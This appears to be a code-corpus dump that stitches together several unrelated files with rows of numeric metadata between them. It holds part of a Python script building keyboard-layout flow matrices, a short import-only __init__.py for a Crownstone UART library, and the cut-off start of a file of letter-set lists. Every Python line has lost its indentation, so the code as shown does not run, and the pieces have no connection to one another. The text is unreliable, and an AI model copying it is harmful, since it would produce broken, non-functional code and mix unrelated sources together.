for x in [4]:
for y in [6,10]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [8]:
for y in [10]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [13]:
for y in [19,23]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [17]:
for y in [23]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [16]:
for y in [18,22]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [20]:
for y in [22]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
if side_above_3away < 1.0:
for x in [1]:
for y in [8,12]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [5]:
for y in [12]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [4]:
for y in [5,9]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [8]:
for y in [9]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [13]:
for y in [20,24]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [17]:
for y in [24]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [16]:
for y in [17,21]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [20]:
for y in [21]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
if shorter_above < 1.0:
for x in [1]:
for y in [6,7,8,10,11,12]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [2]:
for y in [7,11]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [4]:
for y in [6,7,10,11]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [5]:
for y in [10,11,12]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [6]:
for y in [11]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [8]:
for y in [10,11]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [16]:
for y in [17,18,19,21,22,23]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [15]:
for y in [18,22]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [13]:
for y in [18,19,22,23]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [20]:
for y in [21,22,23]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [19]:
for y in [22]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [17]:
for y in [22,23]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
if ring_above_middle < 1.0:
ring_above_middles = [[2,7],[6,11],[2,11],
[15,18],[19,22],[15,22]]
for x in ring_above_middles:
T[x[0]-1, x[1]-1] *= ring_above_middle
T[x[1]-1, x[0]-1] *= ring_above_middle
if middle_above_ring < 1.0:
middle_above_rings = [[6,3],[10,7],[10,3],
[19,14],[23,18],[23,14]]
for x in middle_above_rings:
T[x[0]-1, x[1]-1] *= middle_above_ring
T[x[1]-1, x[0]-1] *= middle_above_ring
# 10. Avoid using the same finger.
# 1 2 3 4 13 14 15 16
# 5 6 7 8 17 18 19 20
# 9 10 11 12 21 22 23 24
if same_finger < 1.0:
same_fingers = [[1,5],[5,9],[1,9], [2,6],[6,10],[2,10], [3,7],[7,11],[3,11], [4,8],[8,12],[4,12],
[13,17],[17,21],[13,21], [14,18],[18,22],[14,22], [15,19],[19,23],[15,23], [16,20],[20,24],[16,24]]
for x in same_fingers:
T[x[0]-1, x[1]-1] *= same_finger
T[x[1]-1, x[0]-1] *= same_finger
# 11. Avoid the upper and lower rows.
# 1 2 3 4 13 14 15 16
# 5 6 7 8 17 18 19 20
# 9 10 11 12 21 22 23 24
if not_home_row < 1.0:
not_home_row_keys = [1,2,3,4, 9,10,11,12, 13,14,15,16, 21,22,23,24]
for x in not_home_row_keys:
for j in range(0,23):
T[x-1, j] *= not_home_row
T[j, x-1] *= not_home_row
# 12. Avoid skipping over the home row.
# 1 2 3 4 13 14 15 16
# 5 6 7 8 17 18 19 20
# 9 10 11 12 21 22 23 24
if skip_row_0away < 1.0:
skip_top = [1, 2, 3, 4, 13,14,15,16]
skip_bot = [9,10,11,12, 21,22,23,24]
for ix, x in enumerate(skip_top):
y = skip_bot[ix]
T[x-1, y-1] *= skip_row_0away
T[y-1, x-1] *= skip_row_0away
if skip_row_1away < 1.0:
skip_top = [1, 2, 2, 3, 3, 4, 13,14,14,15,15,16]
skip_bot = [10,9,11,10,12,11, 22,21,23,22,24,23]
for ix, x in enumerate(skip_top):
y = skip_bot[ix]
T[x-1, y-1] *= skip_row_1away
T[y-1, x-1] *= skip_row_1away
if skip_row_2away < 1.0:
skip_top = [1, 2,3, 4, 13,14,15,16]
skip_bot = [11,12,9,10, 23,24,21,22]
for ix, x in enumerate(skip_top):
y = skip_bot[ix]
T[x-1, y-1] *= skip_row_2away
T[y-1, x-1] *= skip_row_2away
if skip_row_3away < 1.0:
skip_top = [1, 4, 13,16]
skip_bot = [12,9, 24,21]
for ix, x in enumerate(skip_top):
y = skip_bot[ix]
T[x-1, y-1] *= skip_row_3away
T[y-1, x-1] *= skip_row_3away
Flow24x24 = T
# Normalize matrix with min-max scaling to a range with maximum = 1:
newMin = np.min(Flow24x24) / np.max(Flow24x24)
newMax = 1.0
Flow24x24 = newMin + (Flow24x24 - np.min(Flow24x24)) * (newMax - newMin) / (np.max(Flow24x24) - np.min(Flow24x24))
return Flow24x24
Flow24x24 = create_24x24_flow_matrix(not_home_row, side_top,
side_above_3away, side_above_2away, side_above_1away, middle_above_ring, ring_above_middle, outward,
skip_row_3away, skip_row_2away, skip_row_1away, skip_row_0away, same_finger, lateral, same_hand,
shorter_above, adjacent_offset, inside_top, index_above)
# Print:
print_matrix_info(matrix_data=Flow24x24, matrix_label="Flow24x24", nkeys=24, nlines=30)
heatmap(data=Flow24x24, title="Flow24x24", xlabel="Key 1", ylabel="Key 2", print_output=print_output)
def create_32x32_flow_matrix(not_home_row, side_top, side_above_3away, side_above_2away, side_above_1away,
middle_above_ring, ring_above_middle, outward, skip_row_3away,
skip_row_2away, skip_row_1away, skip_row_0away, same_finger, lateral,
same_hand, shorter_above, adjacent_offset, inside_top, index_above):
all_32_keys = [1,2,3,4, 5,6,7,8, 9,10,11,12, 13,14,15,16, 17,18,19,20, 21,22,23,24,
25,26,27, 28,29,30, 31,32]
# Create a matrix and multiply by flow factors that promote easy interkey transitions:
T = np.ones((32, 32))
if lateral < 1.0:
for x in all_32_keys:
for y in [25,26,27, 28,29,30, 31,32]:
T[x-1, y-1] *= lateral
T[y-1, x-1] *= lateral
# 7. Promote alternating between hands over uncomfortable transitions with the same hand.
if same_hand < 1.0:
for i in [1,2,3,4,5,6,7,8,9,10,11,12, 25,26,27]:
for j in [1,2,3,4,5,6,7,8,9,10,11,12, 25,26,27]:
T[i-1,j-1] *= same_hand
for i in [13,14,15,16,17,18,19,20,21,22,23,24, 28,29,30,31,32]:
for j in [13,14,15,16,17,18,19,20,21,22,23,24, 28,29,30,31,32]:
T[i-1,j-1] *= same_hand
# 8. Promote little-to-index-finger roll-ins over index-to-little-finger outsward rolls.
# Penalize (index, little) finger lateral movements:
# 1 2 3 4 25 28 13 14 15 16 31
# 5 6 7 8 26 29 17 18 19 20 32
# 9 10 11 12 27 30 21 22 23 24
if outward < 1.0:
# same-row roll-outs:
roll_ins = [[1,2],[2,3],[3,4], [5,6],[6,7],[7,8], [9,10],[10,11],[11,12],
[16,15],[15,14],[14,13], [20,19],[19,18],[18,17], [24,23],[23,22],[22,21]]
for x in roll_ins:
T[x[1]-1, x[0]-1] *= outward
# same-row roll-outs, skipping keys:
roll_ins_skip_keys = [[1,3],[2,4],[1,4], [5,7],[6,8],[5,8], [9,11],[10,12],[9,12],
[16,14],[15,13],[16,13], [20,18],[19,17],[20,17], [24,22],[23,21],[24,21]]
#[1,25],[2,25],[3,25],
#[5,26],[6,26],[7,26],
#[9,27],[10,27],[11,27],
#[16,28],[15,28],[14,28],
#[20,29],[19,29],[18,29],
#[24,30],[23,30],[22,30],
#[31,15],[31,14],[31,13],[31,28],
#[32,19],[32,18],[32,17],[32,29]]
for x in roll_ins_skip_keys:
T[x[1]-1, x[0]-1] *= outward
# adjacent-row roll-outs:
# 1 2 3 4 25 28 13 14 15 16 31
# 5 6 7 8 26 29 17 18 19 20 32
# 9 10 11 12 27 30 21 22 23 24
roll_ins_adj_rows = [[1,6],[1,7],[1,8],[2,7],[2,8],[3,8],
[5,2],[5,3],[5,4],[6,3],[6,4],[7,4],
[5,10],[5,11],[5,12],[6,11],[6,12],[7,12],
[9,6],[9,7],[9,8],[10,7],[10,8],[11,8],
[16,19],[16,18],[16,17],[15,18],[15,17],[14,17],
[20,15],[20,14],[20,13],[19,14],[19,13],[18,13],
[20,23],[20,22],[20,21],[19,22],[19,21],[18,21],
[24,19],[24,18],[24,17],[23,18],[23,17],[22,17]]
#[5,25],[6,25],[7,25],[8,25],
#[5,27],[6,27],[7,27],[8,27],
#[1,26],[2,26],[3,26],[4,26],
#[9,26],[10,26],[11,26],[12,26],
#[16,29],[15,29],[14,29],[13,29],
#[24,29],[23,29],[22,29],[21,29],
#[20,28],[19,28],[18,28],[17,28],
#[20,30],[19,30],[18,30],[17,30],
#[31,20],[31,19],[31,18],[31,17],[31,29],
#[32,16],[32,15],[32,14],[32,13],[32,28],
#[32,24],[32,23],[32,22],[32,21],[32,30]]
for x in roll_ins_adj_rows:
T[x[1]-1, x[0]-1] *= outward
# upper<->lower row roll-outs:
roll_ins_skip_home = [[1,10],[1,11],[1,12],[2,11],[2,12],[3,12],
[9,2],[9,3],[9,4],[10,3],[10,4],[11,4],
[16,23],[16,22],[16,21],[15,22],[15,21],[14,21],
[24,15],[24,14],[24,13],[23,14],[23,13],[22,13]]
#[16,30],[15,30],[14,30],[13,30],
#[9,25],[10,25],[11,25],[12,25],
#[24,28],[23,28],[22,28],[21,28],
#[1,27],[2,27],[3,27],[4,27],
#[31,24],[31,23],[31,22],[31,21],[31,30]]
for x in roll_ins_skip_home:
T[x[1]-1, x[0]-1] *= outward
# 9. Avoid stretching shorter fingers up and longer fingers down.
# 1 2 3 4 25 28 13 14 15 16 31
# 5 6 7 8 26 29 17 18 19 20 32
# 9 10 11 12 27 30 21 22 23 24
if index_above < 1.0:
for x in [4]:
for y in [4,5,6,7,8,26,9,10,11,12,27,28,13,14,15,16,31,29,17,18,19,20,32,30,21,22,23,24]:
T[x-1, y-1] *= index_above
T[y-1, x-1] *= index_above
for x in [25]:
for y in [25,5,6,7,8,26,9,10,11,12,27,28,13,14,15,16,31,29,17,18,19,20,32,30,21,22,23,24]:
T[x-1, y-1] *= index_above
T[y-1, x-1] *= index_above
for x in [13]:
for y in [1,2,3,4,25,5,6,7,8,26,9,10,11,12,27,13,29,17,18,19,20,32,30,21,22,23,24]:
T[x-1, y-1] *= index_above
T[y-1, x-1] *= index_above
for x in [28]:
for y in [1,2,3,4,25,5,6,7,8,26,9,10,11,12,27,28,29,17,18,19,20,32,30,21,22,23,24]:
T[x-1, y-1] *= index_above
T[y-1, x-1] *= index_above
if inside_top < 1.0:
for x in [4,25,28,13]:
for j in range(0,32):
T[x-1, j] *= inside_top
T[j, x-1] *= inside_top
if side_top < 1.0:
for x in [1,4,25,28,13,16,31]:
for j in range(0,32):
T[x-1, j] *= side_top
T[j, x-1] *= side_top
if side_above_1away < 1.0:
for x in [1]:
for y in [6,10]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [5]:
for y in [10]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [4,25]:
for y in [7,11]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [8,26]:
for y in [11]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [13,28]:
for y in [18,22]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [17,29]:
for y in [22]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [16,31]:
for y in [19,23]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
for x in [20,32]:
for y in [23]:
T[x-1, y-1] *= side_above_1away
T[y-1, x-1] *= side_above_1away
if side_above_2away < 1.0:
for x in [1]:
for y in [7,11]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [5]:
for y in [11]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [4,25]:
for y in [6,10]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [8,26]:
for y in [10]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [13,28]:
for y in [19,23]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [17,29]:
for y in [23]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [16,31]:
for y in [18,22]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
for x in [20,32]:
for y in [22]:
T[x-1, y-1] *= side_above_2away
T[y-1, x-1] *= side_above_2away
if side_above_3away < 1.0:
for x in [1]:
for y in [8,12,26,27]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [5]:
for y in [12,27]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [4,25]:
for y in [5,9]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [8,26]:
for y in [9]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [13,28]:
for y in [20,24,32]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [17,29]:
for y in [24]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [16,31]:
for y in [17,21,29,30]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
for x in [20,32]:
for y in [21,30]:
T[x-1, y-1] *= side_above_3away
T[y-1, x-1] *= side_above_3away
# 1 2 3 4 25 28 13 14 15 16 31
# 5 6 7 8 26 29 17 18 19 20 32
# 9 10 11 12 27 30 21 22 23 24
if shorter_above < 1.0:
for x in [1]:
for y in [6,7,8,26,10,11,12,27]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [2]:
for y in [7,11]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [4]:
for y in [6,7,10,11]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [25]:
for y in [6,7,10,11]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [5]:
for y in [10,11,12,27]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [6]:
for y in [11]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [8]:
for y in [10,11]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [26]:
for y in [10,11]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [16]:
for y in [29,17,18,19,30,21,22,23]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [31]:
for y in [29,17,18,19,30,21,22,23]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [15]:
for y in [18,22]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [13]:
for y in [18,19,22,23]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [28]:
for y in [18,19,22,23]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [20]:
for y in [30,21,22,23]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [32]:
for y in [30,21,22,23]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [19]:
for y in [22]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [17]:
for y in [22,23]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
for x in [29]:
for y in [22,23]:
T[x-1, y-1] *= shorter_above
T[y-1, x-1] *= shorter_above
if ring_above_middle < 1.0:
ring_above_middles = [[2,7],[6,11],[2,11],
[15,18],[19,22],[15,22]]
for x in ring_above_middles:
T[x[0]-1, x[1]-1] *= ring_above_middle
T[x[1]-1, x[0]-1] *= ring_above_middle
if middle_above_ring < 1.0:
middle_above_rings = [[6,3],[10,7],[10,3],
[19,14],[23,18],[23,14]]
for x in middle_above_rings:
T[x[0]-1, x[1]-1] *= middle_above_ring
T[x[1]-1, x[0]-1] *= middle_above_ring
# 10. Avoid using the same finger.
# 1 2 3 4 25 28 13 14 15 16 31
# 5 6 7 8 26 29 17 18 19 20 32
# 9 10 11 12 27 30 21 22 23 24
if same_finger < 1.0:
same_fingers = [[1,5],[5,9],[1,9], [2,6],[6,10],[2,10],
[3,7],[7,11],[3,11], [4,8],[8,12],[4,12],
[25,26],[26,27],[25,27], [28,29],[29,30],[28,30], [31,32],
[4,25],[4,26],[4,27], [8,25],[8,26],[8,27], [12,25],[12,26],[12,27],
[13,28],[13,29],[13,30], [17,28],[17,29],[17,30], [21,28],[21,29],[21,30],
[31,16],[31,20],[31,24], [32,16],[32,20],[32,24],
[13,17],[17,21],[13,21], [14,18],[18,22],[14,22],
[15,19],[19,23],[15,23], [16,20],[20,24],[16,24]]
for x in same_fingers:
T[x[0]-1, x[1]-1] *= same_finger
T[x[1]-1, x[0]-1] *= same_finger
# 11. Avoid the upper and lower rows.
if not_home_row < 1.0:
not_home_row_keys = [1,2,3,4,25, 9,10,11,12,27, 28,13,14,15,16,31, 30,21,22,23,24]
for x in not_home_row_keys:
for j in range(0,32):
T[x-1, j] *= not_home_row
T[j, x-1] *= not_home_row
# 12. Avoid skipping over the home row.
# 1 2 3 4 25 28 13 14 15 16 31
# 5 6 7 8 26 29 17 18 19 20 32
# 9 10 11 12 27 30 21 22 23 24
if skip_row_0away < 1.0:
skip_top = [1, 2, 3, 4, 4,25,25, 28,28,13,13,14,15,16,31]
skip_bot = [9,10,11,12,27,12,27, 30,21,30,21,22,23,24,24]
for ix, x in enumerate(skip_top):
y = skip_bot[ix]
T[x-1, y-1] *= skip_row_0away
T[y-1, x-1] *= skip_row_0away
if skip_row_1away < 1.0:
skip_top = [1, 2, 2, 3, 3, 4, 4,25, 28,13,13,14,14,15,15,16,31]
skip_bot = [10,9,11,10,12,11,27,11, 22,30,22,21,23,22,24,23,23]
for ix, x in enumerate(skip_top):
y = skip_bot[ix]
T[x-1, y-1] *= skip_row_1away
T[y-1, x-1] *= skip_row_1away
if skip_row_2away < 1.0:
skip_top = [1, 2,3, 4,25, 28,13,14,15,16,31]
skip_bot = [11,12,9,10,10, 23,23,24,21,22,22]
for ix, x in enumerate(skip_top):
y = skip_bot[ix]
T[x-1, y-1] *= skip_row_2away
T[y-1, x-1] *= skip_row_2away
if skip_row_3away < 1.0:
skip_top = [1, 4,25, 28,13,16,16,31,31]
skip_bot = [12,9, 9, 24,24,21,30,21,30]
for ix, x in enumerate(skip_top):
y = skip_bot[ix]
T[x-1, y-1] *= skip_row_3away
T[y-1, x-1] *= skip_row_3away
Flow32x32 = T
# Normalize matrix with min-max scaling to a range with maximum = 1:
newMin = np.min(Flow32x32) / np.max(Flow32x32)
newMax = 1.0
Flow32x32 = newMin + (Flow32x32 - np.min(Flow32x32)) * (newMax - newMin) / (np.max(Flow32x32) - np.min(Flow32x32))
return Flow32x32
Flow32x32 = create_32x32_flow_matrix(not_home_row, side_top,
side_above_3away, side_above_2away, side_above_1away, middle_above_ring, ring_above_middle, outward,
skip_row_3away, skip_row_2away, skip_row_1away, skip_row_0away, same_finger, lateral, same_hand,
shorter_above, adjacent_offset, inside_top, index_above)
# Print:
print_matrix_info(matrix_data=Flow32x32, matrix_label="Flow32x32", nkeys=32, nlines=30)
heatmap(data=Flow32x32, title="Flow32x32", xlabel="Key 1", ylabel="Key 2", print_output=print_output)
| 42.685829 | 127 | 0.461962 | 5,645 | 31,929 | 2.49442 | 0.035075 | 0.030964 | 0.024075 | 0.026419 | 0.85555 | 0.84717 | 0.837227 | 0.831901 | 0.812442 | 0.807471 | 0 | 0.216054 | 0.374926 | 31,929 | 747 | 128 | 42.742972 | 0.489478 | 0.15215 | 0 | 0.784148 | 0 | 0 | 0.002078 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003373 | false | 0 | 0 | 0 | 0.006745 | 0.006745 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
119716bcc4218817468b4f4a06b92e51d85d5041 | 179 | py | Python | crownstone_uart/__init__.py | RicArch97/crownstone-lib-python-uart | c0aaf1415936e5e622aa6395fdac4f88ebcf82bf | [
"MIT"
] | null | null | null | crownstone_uart/__init__.py | RicArch97/crownstone-lib-python-uart | c0aaf1415936e5e622aa6395fdac4f88ebcf82bf | [
"MIT"
] | 8 | 2020-06-12T09:55:15.000Z | 2021-11-11T13:48:36.000Z | crownstone_uart/__init__.py | RicArch97/crownstone-lib-python-uart | c0aaf1415936e5e622aa6395fdac4f88ebcf82bf | [
"MIT"
] | 3 | 2020-06-09T13:55:17.000Z | 2021-11-10T09:00:09.000Z | from crownstone_uart.core.CrownstoneUart import CrownstoneUart
from crownstone_uart.core.UartEventBus import UartEventBus
from crownstone_uart.topics.UartTopics import UartTopics
| 44.75 | 62 | 0.899441 | 21 | 179 | 7.52381 | 0.428571 | 0.265823 | 0.341772 | 0.278481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067039 | 179 | 3 | 63 | 59.666667 | 0.946108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
11fc11514e1c5c5457f27710e27133db3fda1e7a | 42,063 | py | Python | updated_alt_sets.py | peterhollander/Weight-Multiplicities | 804d616056f075fbc891c4dab232e6897fd1b247 | [
"MIT"
] | 1 | 2021-07-14T17:06:09.000Z | 2021-07-14T17:06:09.000Z | updated_alt_sets.py | peterhollander/Weight-Multiplicities | 804d616056f075fbc891c4dab232e6897fd1b247 | [
"MIT"
] | null | null | null | updated_alt_sets.py | peterhollander/Weight-Multiplicities | 804d616056f075fbc891c4dab232e6897fd1b247 | [
"MIT"
] | 2 | 2021-07-23T16:26:35.000Z | 2021-07-26T17:17:43.000Z | #number of sets: 1124
currentAltSets1 = [[], ['N'], ['J'], ['C'], ['E'], ['F'], ['A'], ['K'], ['B'], ['P'], ['H'], ['O'], ['D'], ['Q'], ['I'], ['G'], ['M'], ['L'], ['N', 'E'], ['N', 'K'], ['N', 'P'], ['N', 'H'], ['N', 'I'], ['J', 'E'], ['J', 'F'], ['J', 'A'], ['J', 'P'], ['J', 'O'], ['J', 'Q'], ['J', 'G'], ['J', 'L'], ['C', 'E'], ['C', 'F'], ['C', 'A'], ['C', 'K'], ['C', 'O'], ['C', 'Q'], ['C', 'I'], ['C', 'G'], ['E', 'K'], ['E', 'B'], ['F', 'K'], ['F', 'B'], ['F', 'O'], ['F', 'Q'], ['F', 'G'], ['F', 'M'], ['F', 'L'], ['A', 'B'], ['A', 'O'], ['A', 'D'], ['A', 'Q'], ['A', 'L'], ['K', 'H'], ['K', 'Q'], ['K', 'I'], ['K', 'G'], ['K', 'M'], ['K', 'L'], ['B', 'H'], ['P', 'O'], ['P', 'D'], ['P', 'Q'], ['P', 'G'], ['P', 'M'], ['P', 'L'], ['H', 'D'], ['H', 'M'], ['O', 'Q'], ['O', 'I'], ['O', 'G'], ['O', 'M'], ['D', 'Q'], ['D', 'I'], ['D', 'G'], ['D', 'L'], ['Q', 'M'], ['Q', 'L'], ['I', 'G'], ['I', 'M'], ['I', 'L'], ['G', 'M'], ['G', 'L'], ['M', 'L'], ['N', 'J', 'E'], ['N', 'E', 'K'], ['N', 'E', 'B'], ['N', 'K', 'H'], ['N', 'K', 'I'], ['N', 'P', 'I'], ['N', 'P', 'M'], ['N', 'O', 'I'], ['N', 'D', 'I'], ['N', 'I', 'G'], ['N', 'I', 'L'], ['J', 'C', 'E'], ['J', 'E', 'F'], ['J', 'E', 'P'], ['J', 'F', 'K'], ['J', 'F', 'B'], ['J', 'F', 'O'], ['J', 'F', 'Q'], ['J', 'F', 'G'], ['J', 'F', 'L'], ['J', 'A', 'P'], ['J', 'A', 'O'], ['J', 'A', 'D'], ['J', 'A', 'Q'], ['J', 'A', 'L'], ['J', 'P', 'O'], ['J', 'P', 'Q'], ['J', 'P', 'G'], ['J', 'P', 'L'], ['J', 'O', 'Q'], ['J', 'O', 'G'], ['J', 'Q', 'L'], ['J', 'G', 'L'], ['C', 'E', 'A'], ['C', 'E', 'K'], ['C', 'E', 'O'], ['C', 'E', 'Q'], ['C', 'E', 'G'], ['C', 'F', 'K'], ['C', 'F', 'O'], ['C', 'F', 'Q'], ['C', 'F', 'I'], ['C', 'F', 'G'], ['C', 'F', 'M'], ['C', 'A', 'B'], ['C', 'A', 'O'], ['C', 'A', 'D'], ['C', 'A', 'Q'], ['C', 'A', 'I'], ['C', 'K', 'Q'], ['C', 'K', 'I'], ['C', 'K', 'G'], ['C', 'O', 'Q'], ['C', 'O', 'I'], ['C', 'O', 'G'], ['C', 'I', 'G'], ['C', 'I', 'L'], ['E', 'B', 'H'], ['F', 'A', 'B'], ['F', 'K', 'Q'], ['F', 'K', 'G'], ['F', 'K', 'M'], ['F', 'K', 'L'], ['F', 'B', 'H'], ['F', 'B', 'M'], ['F', 'O', 'Q'], ['F', 'O', 'G'], ['F', 'O', 'M'], ['F', 'Q', 'M'], ['F', 'Q', 'L'], ['F', 'G', 'M'], ['F', 'G', 'L'], ['F', 'M', 'L'], ['A', 'B', 'O'], ['A', 'B', 'Q'], ['A', 'B', 'L'], ['A', 'O', 'Q'], ['A', 'D', 'Q'], ['A', 'D', 'G'], ['A', 'D', 'L'], ['A', 'Q', 'L'], ['K', 'B', 'H'], ['K', 'P', 'M'], ['K', 'H', 'D'], ['K', 'H', 'M'], ['K', 'O', 'G'], ['K', 'Q', 'M'], ['K', 'Q', 'L'], ['K', 'I', 'G'], ['K', 'I', 'M'], ['K', 'I', 'L'], ['K', 'G', 'M'], ['K', 'G', 'L'], ['K', 'M', 'L'], ['P', 'H', 'M'], ['P', 'O', 'Q'], ['P', 'O', 'G'], ['P', 'O', 'M'], ['P', 'D', 'Q'], ['P', 'D', 'G'], ['P', 'D', 'L'], ['P', 'Q', 'M'], ['P', 'Q', 'L'], ['P', 'G', 'M'], ['P', 'G', 'L'], ['P', 'M', 'L'], ['H', 'D', 'Q'], ['H', 'D', 'I'], ['H', 'D', 'G'], ['H', 'D', 'M'], ['H', 'D', 'L'], ['O', 'D', 'G'], ['O', 'Q', 'G'], ['O', 'Q', 'M'], ['O', 'Q', 'L'], ['O', 'I', 'G'], ['O', 'I', 'M'], ['O', 'G', 'M'], ['D', 'Q', 'L'], ['D', 'I', 'G'], ['D', 'I', 'L'], ['D', 'G', 'L'], ['Q', 'I', 'L'], ['Q', 'M', 'L'], ['I', 'G', 'M'], ['I', 'G', 'L'], ['I', 'M', 'L'], ['G', 'M', 'L'], ['N', 'J', 'E', 'F'], ['N', 'J', 'E', 'P'], ['N', 'C', 'E', 'I'], ['N', 'E', 'B', 'H'], ['N', 'K', 'P', 'M'], ['N', 'K', 'I', 'G'], ['N', 'K', 'I', 'L'], ['N', 'P', 'H', 'M'], ['N', 'P', 'O', 'I'], ['N', 'P', 'D', 'I'], ['N', 'P', 'I', 'G'], ['N', 'P', 'I', 'M'], ['N', 'P', 'I', 'L'], ['N', 'H', 'D', 'I'], ['N', 'O', 'I', 'G'], ['N', 'D', 'I', 'G'], ['N', 'D', 'I', 'L'], ['N', 'Q', 'I', 'L'], ['N', 'I', 'G', 'L'], ['J', 'C', 'E', 'F'], ['J', 'C', 'E', 'A'], ['J', 'C', 'E', 'P'], ['J', 'C', 'E', 'O'], ['J', 'C', 'E', 'Q'], ['J', 'C', 'E', 'G'], ['J', 'E', 'F', 'K'], ['J', 'E', 'F', 'B'], ['J', 'F', 'A', 'B'], ['J', 'F', 'K', 'Q'], ['J', 'F', 'K', 'G'], ['J', 'F', 'K', 'L'], ['J', 'F', 'B', 'H'], ['J', 'F', 'P', 'M'], ['J', 'F', 'O', 'Q'], ['J', 'F', 'O', 'G'], ['J', 'F', 'Q', 'L'], ['J', 'F', 'G', 'L'], ['J', 'A', 'P', 'O'], ['J', 'A', 'P', 'D'], ['J', 